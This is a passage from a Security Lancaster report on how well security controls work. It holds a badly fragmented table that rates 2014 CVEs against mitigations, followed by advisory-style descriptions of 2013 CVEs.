cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
